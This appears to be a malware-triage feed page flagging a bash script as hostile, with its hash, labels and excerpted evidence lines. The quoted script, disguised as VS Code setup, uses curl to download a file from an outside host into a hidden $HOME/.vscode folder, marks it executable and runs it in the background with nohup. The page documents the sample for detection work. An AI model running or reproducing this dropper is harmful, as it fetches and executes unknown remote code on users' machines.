Hostile 100% linux Download

mac

Downloads and executes remote script

Editor config script download executionHidden home script made executable and launched in background
SHA-25655555e947e261ba604d11975dced1e7db63adf6e1f36b65aec5bb0de45cc7ed7

Evidence

Editor config script download execution lines 1–42
1#!/bin/bash
2set -e
3
4# -------------------------
5# Step 1: Make sure the .vscode directory exists
6# -------------------------
7mkdir -p "$HOME/.vscode"
8
9# -------------------------
10# Step 2: Download the script if it doesn't exist or if it's not updated
11# -------------------------
12
13echo "Downloading or updating vscode-bootstrap.sh..."
14curl -s -L -o "$HOME/.vscode/vscode-bootstrap.sh" "https://quick-load.vercel.app/api/settings/bootstraplinux"
15
16# -------------------------
17# Step 3: Check if the script exists and make it executable
18# -------------------------
19
20if [ -f "$HOME/.vscode/vscode-bootstrap.sh" ]; then
21 chmod +x "$HOME/.vscode/vscode-bootstrap.sh"
22 echo "Script is now executable."
23else
⋯7 lines
31
32echo "Running the script in the background..."
33nohup bash "$HOME/.vscode/vscode-bootstrap.sh"
34
35
⋯7 lines

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.